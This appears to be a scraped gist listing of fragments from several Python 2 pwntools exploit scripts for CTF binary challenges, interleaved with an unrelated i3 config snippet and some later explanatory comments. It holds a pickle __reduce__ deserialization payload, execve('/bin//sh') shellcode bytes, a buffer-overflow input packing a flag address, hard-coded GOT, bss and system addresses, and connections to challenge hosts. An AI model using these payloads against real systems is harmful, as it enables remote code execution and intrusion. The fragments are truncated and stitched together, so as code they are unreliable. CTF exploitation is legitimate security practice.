
Cubarco cubarco

#!/usr/bin/env python
# coding=utf8
import urllib2
import pickle
class Payload(object):
def __reduce__(self):
comm = "sys.stderr.write(__import__('__main__').flag.flag)"
#!/usr/bin/env python
# coding=utf8
from pwn import p64, remote
from time import sleep
from struct import unpack
# Fixed code address inside the target binary. The name suggests a point in
# main() just past its opening push; presumably a return target (confirm
# against the binary). 0x4004ee lies in the usual non-PIE x86-64 load range, so
# the value is only stable when the target is built without PIE.
main_without_push_addr = 0x4004ee
# pwntools remote(host, port): opens a TCP connection to a hard-coded IP and
# port, presumably the CTF service this script was written for.
p = remote('136.243.194.41', 666)
cubarco / pwnable-rookiss-note.py
Last active January 23, 2016 16:07
This may take more than a minute, and may fail at the end. Keep trying and you'll get the shell XD
#!/usr/bin/env python
# coding=utf8
from pwn import p32, process, remote
# Local-debug variant, left disabled: runs the ./note binary as a child process.
# p = process('./note')
# Connects to port 9019 on host '0', presumably the local machine, i.e. the
# script is meant to run on the challenge host itself (confirm).
p = remote('0', 9019)
# 24 bytes of 32-bit x86 Linux machine code: the embedded ASCII spells
# "/bin//sh", \xb0\x0b loads syscall number 11 (execve) and \xcd\x80 is int 0x80;
# the final \x90 is a NOP. It can only run from memory that is mapped
# executable, so a non-executable stack/heap (NX) on the target defeats it.
shellcode = '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x90'
# Python 2 print statement: this file does not parse under Python 3.
print '[*] Receiving welcome message...'
#!/usr/bin/env python
# coding=utf8
from pwn import p64, remote
# pwntools remote(host, port): TCP connection to a hard-coded IP and port,
# presumably the challenge service (the payload prefix below points to ZCTF).
p = remote('115.28.27.103', 22222)
# Fixed data address in the target binary; by its name, where the flag is held.
# A constant like this is only valid for a non-PIE build (confirm).
flag_addr = 0x6010c0
# One line of input: the 5-byte literal 'ZCTF{', 29 bytes of 0x01 and 262 NUL
# bytes (296 bytes in total), then flag_addr + 5 packed by p64 as a 64-bit
# little-endian value. The +5 equals len('ZCTF{'), so the pointer presumably
# refers to the flag body after its prefix (confirm). The input is evidently
# longer than the service's buffer; a length check on the read would reject it.
p.sendline('ZCTF{' + '\x01'*29 + '\x00'*262 + p64(flag_addr+5))
#!/usr/bin/env python
# coding=utf8
from pwn import p64, ELF, process, remote
from struct import unpack
from time import sleep
# Local-debug variant, left disabled: runs the ./note1 binary as a child process.
# p = process('./note1')
# pwntools remote(host, port): TCP connection to a hard-coded IP and port,
# presumably the challenge service.
p = remote('115.28.27.103', 9001)
# Parses a libc-2.19 copy from the working directory, presumably the build the
# remote service links against, so symbol offsets are read from the matching
# version. The offsets are wrong for any other libc build (confirm the match).
elf = ELF('./libc-2.19.so')
#!/usr/bin/env python
# coding=utf8
from pwn import p64, u64, process, ELF
# Parses the local system libc, presumably so symbol offsets can be looked up
# later. The offsets only match a process that loaded this exact libc build.
elf = ELF('/lib64/libc.so.6')
# Alternative, left disabled: a bundled libc-2.19 copy instead of the system one.
# elf = ELF('./libc-2.19.so')
# Runs the ./note3 binary locally as a child process (no network target here).
p = process('./note3')
# Fixed address; by its name, the GOT slot for free() in the target binary.
# NOTE(review): a script that relies on this slot presumably expects it to be
# writable, which full RELRO would prevent, and the constant itself assumes a
# non-PIE build (confirm both against the binary).
free_got = 0x602018
#!/usr/bin/env python
# coding=utf8
from pwn import process, ELF, p64
from struct import unpack
# Alternative, left disabled: a bundled libc-2.19 copy instead of the system one.
# elf = ELF('./libc-2.19.so')
# Parses the local system libc, presumably so symbol offsets can be looked up
# later. The offsets only match a process that loaded this exact libc build.
elf = ELF('/lib64/libc.so.6')
# Runs the ./note2 binary locally as a child process (no network target here).
p = process('./note2')
cubarco / config
Created March 5, 2016 09:01
My i3 configs.
#.......
# font
#.......
#font -*-cure-medium-*-*-*-11-*-*-*-*-*-*-*
font pango:snap, Tamsyn, WenQuanYi Bitmap Song, FontAwesome, Unifont 8
#..........
# windows
#..........
#!/usr/bin/env python
# coding=utf8
from pwn import u64, process, remote, shellcraft, context, asm
# Tells pwntools to treat the target as x86-64; this affects the asm and
# shellcraft helpers imported above.
context.arch = 'amd64'
# Fixed address; the name suggests a location in the target's .bss section
# (confirm). A constant like this is only valid for a non-PIE build.
bss_o = 0x602098
# Runs the ./echo2 binary locally as a child process (no network target here).
p = process('./echo2')
#!/usr/bin/env python
# coding=utf8
from pwn import process, p32, remote
from base64 import b64encode
from time import time
from subprocess import check_output
system = 0x8049187
buf = 0x804B0E0